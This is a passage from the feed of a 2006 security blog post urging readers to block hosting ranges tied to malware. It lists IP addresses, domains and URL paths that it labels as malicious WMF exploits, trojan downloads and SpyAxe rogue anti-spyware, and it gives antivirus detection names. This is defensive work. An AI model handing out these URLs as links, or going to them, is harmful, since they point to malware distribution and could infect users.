/&gt;&lt;tr&gt;&lt;td&gt;85.255.115.75&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.98&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.108&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.154&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.171/bt/7/wmf/wmf_dcode.wmf&lt;/td&gt;&lt;td&gt;malicious WMF file&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.171/pa/4/inp.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.174 updatesecurity.com&lt;/td&gt;&lt;td&gt;rogue anti-spyware application&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.226/1/gdnUS1402.exe&lt;/td&gt;&lt;td&gt;SpyAxe rogue anti-spyware application&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.227/1/gdnUS1402.exe&lt;/td&gt;&lt;td&gt;SpyAxe rogue anti-spyware application&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/table&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;85.255.115.227 is also 2awm.com, 2youx.net, awmgate.com, awmnet.com, check-wire.com, find-by-web.com, lab-wire.com, lipdolls.net, netvoine.biz, online-more.com, search4com, zlex.org, zllin.info, and ztrf.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;&lt;br /&gt;&lt;table&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us053/e.anr&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_ANICMOO.AD" target="_blank"&gt;TROJ_ANICMOO.AD&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us053/index1.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us053/Anima.class&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us053/jar.jar&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us053/index.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us24/e.anr&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_ANICMOO.AD" target="_blank"&gt;TROJ_ANICMOO.AD&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us24/jar.jar&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us24/Anima.class&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us24/index.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us24/index1.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us24//main.chm&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=CHM_MINER.A" target="_blank"&gt;CHM_MINER.A&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us26/e.anr&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_ANICMOO.AD" target="_blank"&gt;TROJ_ANICMOO.AD&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us26/index.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us26/index1.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zllin.info/e/us26/index1.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/fr/?id=us27&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/fr/tp/?id=us27&amp;amp;tp=lan&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/new/us27/Anima.class&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/new/us27/zl.anr&lt;/td&gt;&lt;td&gt;TROJ_ANI.L&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/per/jara.jar (Gummy.class)&lt;/td&gt;&lt;td&gt;JAVA_BYTEVER.A-1&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/per/?ct=lan&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/per/aAnima.class&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/psg/us27/indexa.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/psg/us27/index.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;zlex.org/psg/us27/psg.anr&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_ANI.H" target="_blank"&gt;TROJ_ANI.H&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;br /&gt;&lt;/table&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;&lt;br /&gt;&lt;table&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.230/1/gdnUS1402.exe&lt;/td&gt;&lt;td&gt;SpyAxe rogue anti-spyware application&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.116.29 Name server&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.116.43 Name server&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.116.149 Name server&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.116.212/pa/inp/inpl.php?id=pt6&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.116.213/pa/inp/inpl.php?id=pt4&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.38/_cnt2.htm&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=HTML_HTHELP.A" target="_blank"&gt;HTML_HTHELP.A&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.38/cnt8_secret.htm&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.38/cnt8.ani&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.38/cnt8.htm&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_ANICMOO.N" target="_blank"&gt;TROJ_ANICMOO.N&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.38/cnt7_dhycnft.htm&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.38/site.htm?lng=1&amp;trg=rc&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.50/pa/1/newe/assemble1.htm&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.50/pa/1/newe/css.wmf&lt;/td&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.50/pa/1/newe/index.ani&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.50/pa/1/newe/makeit.htm&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.50/pa/1/newe/prepare.htm&lt;/td&gt;&lt;td&gt;JS_EXPLOIT.AC&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.50/pa/inp/i.php?id=pa1&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.51/pa/inp/newver/WkNRT3JrVXl0Sm9BQUVYMVV3RUFBQURV.wmf&lt;/tr&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.53/pa/inp/img/aC1QUUZVVXl0Sm9BQUdWc2xHNEFBQUZq.html&lt;/td&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.53/pa/inp/img/aHA4eE5VVXl0Sm9BQUg2RWZZZ0FBQUpM.html&lt;/td&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.53/pa/inp/img/akBVcGVrVXl0Sm9BQUU3eno0MEFBQUo3.wmf&lt;/td&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.53/pa/inp/img/bzl6OExrVXl0Sm9BQURLRThQa0FBQUZI.wmf&lt;/td&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.52/pa/inp/img/cDlHdGpFVXl0Sm9BQUIzSmV3VUFBQUJD.htm&lt;/td&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.117.53/pa/inp/img/ZXZhVmhVVXl0Sm9BQUR1QkxQSUFBQUZx.wmf&lt;/td&gt;&lt;td&gt;EXPL_WMF.GEN&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/19736909-113788617918301116?l=spywarehunt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spywarehunt.blogspot.com/feeds/113788617918301116/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=19736909&amp;postID=113788617918301116' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/113788617918301116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/113788617918301116'/><link rel='alternate' type='text/html' href='http://spywarehunt.blogspot.com/2006/01/block-access-to-intercage-and-inhoster.html' title='Block access to InterCage and Inhoster'/><author><name>pen</name><uri>http://www.blogger.com/profile/09864726096628334525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
